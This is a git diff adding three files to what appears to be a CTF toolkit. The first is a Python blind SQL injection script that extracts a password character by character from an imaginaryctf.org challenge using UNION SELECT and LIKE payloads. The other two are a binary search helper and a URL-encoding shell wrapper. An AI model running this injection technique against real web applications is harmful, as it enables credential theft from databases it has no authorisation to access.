diff options
| -rwxr-xr-x | templates/sqlnameoracle.py | 35 | ||||
| -rw-r--r-- | tools/bsearch.py | 44 | ||||
| -rwxr-xr-x | tools/urlencode | 8 |
3 files changed, 87 insertions, 0 deletions
diff --git a/templates/sqlnameoracle.py b/templates/sqlnameoracle.py new file mode 100755 index 0000000..cec6d98 --- /dev/null +++ b/templates/sqlnameoracle.py @@ -0,0 +1,35 @@ +#!/usr/bin/env python3 + +import string +import requests + +url = "https://awkward-bypass.chal.imaginaryctf.org/user" + +base = '\' UNION SELECT username, NULL FROM users WHERE ' +#base += 'username LIKE \'' +base += 'password LIKE \'' +tail = '%\' ESCAPE \'!\' --' +soln = '' + +while True : + found = False + for c in string.printable[:95]: + ch = c + if ch in '%[]^-!': + continue + if ch == '_': + ch = '!_' + test = soln + ch + payload = base + test + tail + code = 400 + while code != 200: + r = requests.post(url,data={'username':payload,'password':'test'}) + code = r.status_code + log = soln+c + print(log+": " if "Error" in r.text else log+": ***********") + if not "Error" in r.text : + found = True + soln += c + break + if not found: + break diff --git a/tools/bsearch.py b/tools/bsearch.py new file mode 100644 index 0000000..1c92343 --- /dev/null +++ b/tools/bsearch.py @@ -0,0 +1,44 @@ +#binary search +#searches for an s in i that satisfies x == f(i[s]) +#i = iterable +#f = function to call on each element of i +#x = value to search for +#start = offset into iterable to start +#end = offset into iterable to end +#if it finds a match, it returns a tuple of (s,i[s],f(i[s])) +#if it does not find a match, it returns (-1,None,None) +def bsearch(i,f,x,start=0,end=-1): + if end == -1: + end = len(i)-1 + #s = _bsearch(i,f,start,end,x) + s = _bsearch2(i,f,start,end,x) + return (s,i[s],f(i[s])) if s != -1 else (s,None,None) + +#recursive +def _bsearch(i,f,lo,hi,x): + if hi >= lo: + md = (hi+lo)//2 + a = f(i[md]) + if a == x: + return md + elif a > x: + return _bsearch(i,f,lo,md-1,x) + else: + return _bsearch(i,f,md+1,hi,x) + else: + return -1 + +#loop +def _bsearch2(i,f,lo,hi,x): + while True: + if hi >= lo: + md = (hi+lo)//2 + a = f(i[md]) + if a == x: + return md + elif a > x: + hi = md-1 + else: + lo = md+1 + else: + return -1 diff --git a/tools/urlencode b/tools/urlencode new file mode 100755 index 0000000..7924db9 --- /dev/null +++ b/tools/urlencode @@ -0,0 +1,8 @@ +#!/bin/bash +read foo +if [[ $* == -d ]] +then +perl -MURI::Escape -e 'print uri_unescape($ARGV[0])' $foo +else +perl -MURI::Escape -e 'print uri_escape($ARGV[0])' $foo +fi |